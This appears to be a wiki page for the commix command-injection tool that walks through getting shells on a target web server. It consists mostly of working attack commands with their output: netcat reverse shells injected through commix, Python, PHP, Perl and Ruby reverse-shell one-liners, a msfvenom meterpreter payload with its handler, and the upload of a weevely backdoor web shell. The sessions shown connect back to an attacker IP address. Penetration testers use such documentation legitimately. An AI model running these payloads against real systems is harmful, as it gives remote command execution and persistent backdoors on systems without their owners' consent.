-
-
Notifications
You must be signed in to change notification settings - Fork 827
Getting Shells
Step 1. Set up a netcat reverse shell.
In a shell on your machine run nc -lvp 1234 to begin listening to inbound connections on port 1234.
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
Step 2 Execute netcat via commix.
In a separate shell, run :
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=127.0.0.1" --os-cmd="nc -e /bin/sh 192.168.178.3 1234"
or
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=127.0.0.1" --os-cmd="/bin/nc.traditional -e /bin/sh 192.168.178.3 1234"
or via "reverse_tcp" shell option
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=127.0.0.1"
[...]
Pseudo-Terminal (type '?' for available options)
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST 192.168.178.3
LHOST => 192.168.178.3
commix(reverse_tcp) > set LPORT 1234
LPORT => 1234
---[ Reverse TCP shells ]---
Type '1' to use a Netcat reverse TCP shell.
Type '2' for other reverse TCP shells.
commix(reverse_tcp) > 1
---[ Unix-like targets ]---
Type '1' to use the default Netcat on target host.
Type '2' to use Netcat for Busybox on target host.
Type '3' to use Netcat-Traditional on target host.
commix(reverse_tcp_netcat) > 3
Step 3. Enjoy netcat reverse shell.
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.178.3] from debian [192.168.178.4] 36746
whoami
www-data
In the following examples (which are inspired by Pentestmonkey's post "Reverse Shell Cheat Sheet") we're setting up reverse shells to netcat, without using netcat!! Feel free to add your suggestions!
Step 1. Set up a netcat reverse shell.
In a shell on your machine run nc -lvp 1234 to begin listening to inbound connections on port 1234.
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
Step 2. Choose one of the following netcat-without-netcat reverse shell payloads.
Execute one of the following netcat-without-netcat reverse shell payloads through commix as a command (i.e via the "--os-cmd" option):
1. Python-reverse-shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.178.3\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'
2. PHP-reverse-shell:
php -r '\$sock=fsockopen(\"192.168.178.3\",1234);exec(\"/bin/sh -i <%263 >%263 2>%263\");'
3. Perl-reverse-shell:
perl -e 'use Socket;\$i=\"192.168.178.3\";\$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/bin/sh -i\");};'
4. Ruby-reverse-shell:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"192.168.178.3\",1234);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'
Let's suppose that you want a reverse shell on ip "192.168.178.3" and on port "1234" with Python-reverse-shell. Just type in a separate shell the following command :
root@kali:~/Desktop/commix# python commix.py --url="http://192.168.178.4/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --os-cmd="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.178.3\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
Step 3. Enjoy your netcat-without-netcat reverse shell.
root@kali:~# nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.178.3] from debian [192.168.178.4] 43712
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Step 1: Create the PHP meterpreter shell (via msfvenom)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.178.3 LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.php
Note: Don't forget to add <?php and ?> in to msfvenom.php file
Step 2: Start the handler (via msfconsole)
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.178.3
LHOST => 192.168.178.3
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.178.3:4444
[*] Starting the payload handler...
Step 3: Use commix to create "msfvenom.php" file on target's "/var/www/" directory and execute it.
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"
Step 4: Enjoy your shell!
[*] Sending stage (40499 bytes) to 192.168.178.4
[*] Meterpreter session 1 opened (192.168.178.3:4444 -> 192.168.178.4:50450) at 2015-05-16 03:11:42 -0400
meterpreter > sysinfo
Computer : debian
OS : Linux debian 3.16.0-4-586 #1 Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) i686
Meterpreter : php/php
meterpreter >
Step 1 : Create the PHP web shell.
weevely generate commix
[generate.php] Backdoor file 'weevely.php' created with password 'commix'
Step 2 : Use commix to create "weevely.php" file on target's "var/www/html/cmd/" directory.
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/weevely.php" --file-dest="/var/www/html/cmd/"
Step 3 : Enjoy your shell!
weevely http://192.168.178.4/cmd/weevely.php commix
________ __
| | | |----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|____|____|___/|____|__|___ | v1.1
|_____|
Stealth tiny web shell
[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/192.168.178.4/weevely.session'
www-data@debian:/var/www/html/cmd $ ls -la
total 16
drwxrwxrwx 2 root root 4096 May 18 02:02 .
drwxrwxrwx 8 root root 4096 May 14 01:49 ..
-rw-rw-rw- 1 root root 353 May 8 03:28 normal.php
-rw-r--r-- 1 www-data www-data 606 May 18 02:02 weevely.php
At the right side panel, you can find detailed information about Commix Project.